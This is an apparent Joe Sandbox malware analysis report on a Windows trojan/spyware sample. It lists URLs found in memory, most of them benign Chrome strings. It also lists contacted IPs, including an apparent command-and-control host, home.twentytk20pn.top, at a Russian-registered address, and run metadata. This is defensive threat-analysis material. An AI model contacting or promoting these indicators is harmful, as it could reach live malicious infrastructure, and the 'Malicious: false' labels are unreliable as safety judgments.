https://photos.google.com/settings?referrer=CHROME_NTP	chrome.exe, 0000000A.00000002.1719301312.000077D402BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1719043134.000077D402B97000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1695606383.000077D403268000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7714	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://unisolated.invalid/	chrome.exe, 0000000A.00000002.1719229790.000077D402BC8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 0000000A.00000003.1697390107.000077D403380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697530555.000077D403458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/chrome/tips/	chrome.exe, 0000000A.00000002.1725051128.000077D40333C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718986750.000077D402B54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718060753.000077D4029F4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2	chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6248	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6929	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/68763	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/5281	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/?feature=ytca	chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/255411748	chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/u/0/create?usp=chrome_actions	chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718020308.000077D4029D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720780216.000077D402F14000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716708558.000077D4026D8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/?q=	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1719043134.000077D402B74000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 0000000A.00000003.1692504233.000077D402F80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enM	chrome.exe, 0000000A.00000002.1717511799.000077D4028E8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 0000000A.00000003.1695928537.000077D4032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697390107.000077D403380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696971124.000077D40320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696022186.000077D4032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1721454553.000077D402F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696270052.000077D403300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696051656.000077D403334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697530555.000077D403458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696905806.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696839708.000077D402F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696874529.000077D403124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716038275.000077D4024FF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696076889.000077D4031C0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.ico	chrome.exe, 0000000A.00000002.1720281101.000077D402E28000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/161903006	chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	chrome.exe, 0000000A.00000002.1717477312.000077D4028CC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.ico	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 0000000A.00000002.1717882214.000077D40297C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716783630.000077D402708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1722075396.000077D403034000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716640277.000077D4026B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1723592823.000077D4031BC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3078	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7553	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5375	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://httpbin.org/ipbefore	SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/5371	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://developer.chrome.com/extensions/external_extensions.html)	chrome.exe, 0000000A.00000002.1715027438.000077D402318000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 0000000A.00000002.1717882214.000077D40297C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716783630.000077D402708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1722075396.000077D403034000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7556	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	chrome.exe, 0000000A.00000002.1714355833.000077D402220000.00000004.00000800.00020000.00000000.sdmp	false		high
https://clients4.google.com/chrome-sync	chrome.exe, 0000000A.00000002.1715458976.000077D4023E0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://html4/loose.dtd	SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	false		high
http://anglebug.com/6692	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/258207403	chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3625	chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3624	chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/J	chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5007	chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717477312.000077D4028CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/drive/installwebapp?usp=chrome_default	chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716258936.000077D402578000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3862	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 0000000A.00000003.1695665623.000077D402F80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1721334758.000077D402F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026AF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1693515231.000077D402F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696549350.000077D402F6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1694423586.000077D402F80000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1718684184.000077D402AB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1693593094.000077D4026AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716134271.000077D402520000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692469687.000077D402F5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692399699.000077D402F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697492707.000077D402540000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692504233.000077D402F80000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/search?q=&addon=opensearch	chrome.exe, 0000000A.00000002.1720281101.000077D402E28000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4836	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.css	SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.ico	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/:	chrome.exe, 0000000A.00000002.1717343912.000077D402888000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4384	chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717477312.000077D4028CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/35025	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/3970	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717223028.000077D402830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW	chrome.exe, 0000000A.00000002.1717955813.000077D4029A8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716640277.000077D4026B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1723592823.000077D4031BC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs	chrome.exe, 0000000A.00000002.1719043134.000077D402B74000.00000004.00000800.00020000.00000000.sdmp	false		high
https://policies.google.com/	chrome.exe, 0000000A.00000002.1719301312.000077D402BEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1719043134.000077D402B97000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1695606383.000077D403268000.00000004.00000800.00020000.00000000.sdmp	false		high
http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnY322	SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	false		high
http://polymer.github.io/CONTRIBUTORS.txt	chrome.exe, 0000000A.00000003.1695928537.000077D4032D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697390107.000077D403380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696971124.000077D40320C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696022186.000077D4032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1721454553.000077D402F9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696270052.000077D403300000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696051656.000077D403334000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697530555.000077D403458000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696905806.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696839708.000077D402F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696874529.000077D403124000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716038275.000077D4024FF000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1696076889.000077D4031C0000.00000004.00000800.00020000.00000000.sdmp	false		high
http://.jpg	SwJD3kiOwV.exe, 00000002.00000003.1295175578.000000000793F000.00000004.00001000.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-query.fastly-edge.com/2P	chrome.exe, 0000000A.00000003.1684704880.000031A00039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1712332797.000031A00080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1684483515.000031A000390000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7604	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7761	chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716578996.000077D4026A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7760	chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1717223028.000077D402830000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	chrome.exe, 0000000A.00000002.1716821084.000077D402720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1716783630.000077D402708000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000002.1720030517.000077D402DDC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5901	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3965	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6439	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7406	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7161	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/search?q=$	chrome.exe, 0000000A.00000003.1697244740.000077D4025AC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7162	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5906	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/2517	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4937	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1692018372.000077D402BB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691513175.000077D402598000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/73697	chrome.exe, 0000000A.00000002.1720343646.000077D402E48000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://issuetracker.google.com/166809097	chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high
http://issuetracker.google.com/200067929	chrome.exe, 0000000A.00000003.1691989349.000077D402598000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.19.228	www.google.com	United States	15169	GOOGLEUS	false
98.85.100.80	httpbin.org	United States	11351	TWC-11351-NORTHEASTUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
194.87.47.113	home.twentytk20pn.top	Russian Federation	49392	ASBAXETNRU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578085
Start date and time:	2024-12-19 08:46:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SwJD3kiOwV.exe renamed because original name is a hash value
Original Sample Name:	cbb6759a3eb582b7a659ebe3bee1ddab.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@21/7@16/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 14 Number of non-executed functions: 198
